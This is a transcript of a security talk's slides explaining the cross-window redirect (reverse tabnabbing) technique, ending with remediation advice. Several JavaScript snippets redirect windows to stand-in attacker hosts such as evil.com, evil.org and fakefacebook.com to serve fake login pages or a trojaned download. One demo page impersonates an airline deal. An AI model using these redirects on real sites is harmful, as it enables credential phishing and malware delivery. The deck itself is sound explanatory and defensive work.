The Cross Window redirect
-
Upload
michael-hendrickx -
Category
Technology
-
view
1.570 -
download
0
Transcript of The Cross Window redirect
![Page 1: The Cross Window redirect](https://reader035.fdocuments.in/reader035/viewer/2022062310/58eeb5ec1a28abaf628b45c9/html5/thumbnails/1.jpg)
Cross Window Redirect
Khaled HawasliMichael Hendrickx
![Page 2: The Cross Window redirect](https://reader035.fdocuments.in/reader035/viewer/2022062310/58eeb5ec1a28abaf628b45c9/html5/thumbnails/2.jpg)
Who are we?• Khaled Hawasli– Manager Security Analysis @ HelpAG
• Michael Hendrickx– Security Analyst @ HelpAG
![Page 3: The Cross Window redirect](https://reader035.fdocuments.in/reader035/viewer/2022062310/58eeb5ec1a28abaf628b45c9/html5/thumbnails/3.jpg)
Preface• Social Engineering
becomes more sophisticated
• People don’t fall for the “click here” trick– Receive email with link– Click link– Presented with login
screen
![Page 5: The Cross Window redirect](https://reader035.fdocuments.in/reader035/viewer/2022062310/58eeb5ec1a28abaf628b45c9/html5/thumbnails/5.jpg)
Cross-Window Redirect• Exploiting opened windows using JS• Unknowingly hyperlink redirections• Works on all browsers• 2 Variants:– Child window redirect– Parent window redirect
![Page 6: The Cross Window redirect](https://reader035.fdocuments.in/reader035/viewer/2022062310/58eeb5ec1a28abaf628b45c9/html5/thumbnails/6.jpg)
Child window redirect• Control the link you just opened
Opens Gmail withwindow.open()
Redirect to fake phishing page
Parent Window
The attackers site (controlling window)
Child Window
The targeted site (controlled window)
childWindow = window.open(‘https://mail.google.com’);childWindow.location = ‘http://mail.google.com.evil.com/gmail/login.php’;
1
2
![Page 7: The Cross Window redirect](https://reader035.fdocuments.in/reader035/viewer/2022062310/58eeb5ec1a28abaf628b45c9/html5/thumbnails/7.jpg)
X-windows redirect demo• Let’s get malware to users– Let’s watch a movie– We need a movie player
http://michaelhendrickx.com/misc/sf.html
![Page 8: The Cross Window redirect](https://reader035.fdocuments.in/reader035/viewer/2022062310/58eeb5ec1a28abaf628b45c9/html5/thumbnails/8.jpg)
X-windows redirect explained• Link to SF to download software– Rewrite the link before the countdown
sf = window.open(‘http://sourceforge.net/...’);setTimeout(function(){ sf.location = ‘http://evil.org/nmap.tar.gz’;
}, 4000);
![Page 9: The Cross Window redirect](https://reader035.fdocuments.in/reader035/viewer/2022062310/58eeb5ec1a28abaf628b45c9/html5/thumbnails/9.jpg)
Multiple ways to attack this:• setTimeout():– Wait for a while and redirect the page.
• Interactive():– Server polling using XHR– Attacker can flip page on demand
• HTML5 Visibility API:– Flip page when user is not looking
https://github.com/ndrix/xwindow-redirect
![Page 10: The Cross Window redirect](https://reader035.fdocuments.in/reader035/viewer/2022062310/58eeb5ec1a28abaf628b45c9/html5/thumbnails/10.jpg)
Parent Window Redirect• “Evil child” can control the parent
1
Opens website with window.open()
Child redirects the parent
Parent Window
The targeted site (controlled window)
Child Window
The attacker site (controlling window)window.open(‘http://mywebsite.com’);
window.opener = ‘http://evil.com/gmail/login.php’;
![Page 11: The Cross Window redirect](https://reader035.fdocuments.in/reader035/viewer/2022062310/58eeb5ec1a28abaf628b45c9/html5/thumbnails/11.jpg)
Parent window redirect: demo• Emirates has some crazy deals!
(Click Facebook message)
![Page 12: The Cross Window redirect](https://reader035.fdocuments.in/reader035/viewer/2022062310/58eeb5ec1a28abaf628b45c9/html5/thumbnails/12.jpg)
Parent window redirect: demo• Emirates has some crazy deals!
<!DOCTYPE html><head><title>Crazy deals from Emirates.com</title></head><body><img src="ek.jpg"/><script>window.opener.location = 'http://fakefacebook.com’;window.location = 'http://www.emirates.com/ae/…';</script></body></html>
![Page 13: The Cross Window redirect](https://reader035.fdocuments.in/reader035/viewer/2022062310/58eeb5ec1a28abaf628b45c9/html5/thumbnails/13.jpg)
Parent window redirect: demo
• User may spend long enough on the target site, believing that Facebook timed out.
Parent Window Child Window1. open child with window.open()
2. Redirect facebook to fake “session logged out”
3. refresh itself to legitimate site
![Page 14: The Cross Window redirect](https://reader035.fdocuments.in/reader035/viewer/2022062310/58eeb5ec1a28abaf628b45c9/html5/thumbnails/14.jpg)
Other sites that use window.open()• Facebook, Amazon widget, …• GMail schema.org
![Page 15: The Cross Window redirect](https://reader035.fdocuments.in/reader035/viewer/2022062310/58eeb5ec1a28abaf628b45c9/html5/thumbnails/15.jpg)
Remediation• Don’t use window.open() to open hyperlinks– Those links may control your page
• Verify if your page was opened from another page– if(window.opener && !window.opener.closed){ ... }
• Preferably, browsers should use X-Frame-Options header for these JS links
![Page 16: The Cross Window redirect](https://reader035.fdocuments.in/reader035/viewer/2022062310/58eeb5ec1a28abaf628b45c9/html5/thumbnails/16.jpg)
Thank you!
Any questions?